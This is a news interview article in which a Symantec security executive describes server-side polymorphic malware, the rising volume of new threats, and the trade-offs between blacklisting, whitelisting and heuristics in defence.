Blacklists, whitelists and heuristics: Symantec describes new threats

Powered by SC Magazine
 
Page 1 of 2 | Single page

iTnews talks to Vincent Weafer, VP Security Response, Symantec, about how server-side polymorphism is changing the security landscape.

Weafer said that new threats have emerged in the security landscape over the past 18 months.

“There are two major changes,” said Weafer. “One is the increasing degree of complexity of the threats. The other is the massive volume of new threats coming out. Instead of seeing one virus and its effects, now we’re seeing one to two million new threats a month.”

Weafer said that this is because of server-side polymorphism: viruses that change every time they are downloaded.

“Imagine if you’ve got a piece of malicious code on a server. You can chop and change it every time a new person comes to the website. We’re talking about Trojans more than anything else.”

Instead of blocking one or two new viruses each day, Symantec’s system is blacklisting 10,000 to 20,000 new blocks every day: an ‘exponential growth of problems’ from 2-3 years ago.

“The typical scenario for a user getting infected today goes like this. The bad guys have scanned websites and found a vulnerable web server: an ordinary website that contains scripting. It could be a travel site, a downloads site or a small business, for example.

“A malware writer attacks the site with an SQL injection, or exploits other vulnerabilities to get their malware onto the site. When users browse the site, they’re exposed to the exploit. They might download data onto their machines. This creates a pathway to download tonnes of stuff – botnets, keyloggers, software updates – limitless information can now be downloaded onto that machine.”

Because these viruses morph every time they’re downloaded, they can be nearly impossible to predict.

“Server-side polymorphism creates literally millions of threats a month. This requires a totally new approach to security,” said Weafer.

Whitelisting, blacklisting and heuristics

The traditional model of internet security involves blacklisting, said Weafer: creating a list of undesirable sites that are automatically blocked at the user’s end.

“The problem with blacklisting is that there are millions and millions of sites,” said Weafer.

“It’s easy to blacklist the top 50 per cent. But once you get to the long end of the tail, there’s little knowledge about these sites and there are millions that you need to try and block.”

Whitelisting – creating a list of trusted sites – is a different approach to the problem.

“Whitelisting is often brought up as the magic pill,” said Weafer. “Whitelisting’s been around for a long time, and it’s only being leveraged by a small number of people – governments and financial services, for example. If you’ve got a controlled environment then you can keep it secure.

“We’re already using whitelisting to augment our behavioural protection. One of our goals is to build the world’s most comprehensive whitelist.”

Blacklists, whitelists and heuristics: Symantec describes new threats
 
 
 
Top Stories
Matching databases to Linux distros
Reviewed: OS-repository DBMSs, MariaDB vs MySQL.
 
Coalition's NBN cost-benefit study finds in favour of MTM
FTTP costs too much, would take too long.
 
Who'd have picked a BlackBerry for the Internet of Things?
[Blog] BlackBerry has a more secure future in the physical world.
 
 
Sign up to receive iTnews email bulletins
   FOLLOW US...
Latest Comments
Polls
Which is the most prevalent cyber attack method your organisation faces?




   |   View results
Phishing and social engineering
  70%
 
Advanced persistent threats
  3%
 
Unpatched or unsupported software vulnerabilities
  12%
 
Denial of service attacks
  6%
 
Insider threats
  10%
TOTAL VOTES: 709

Vote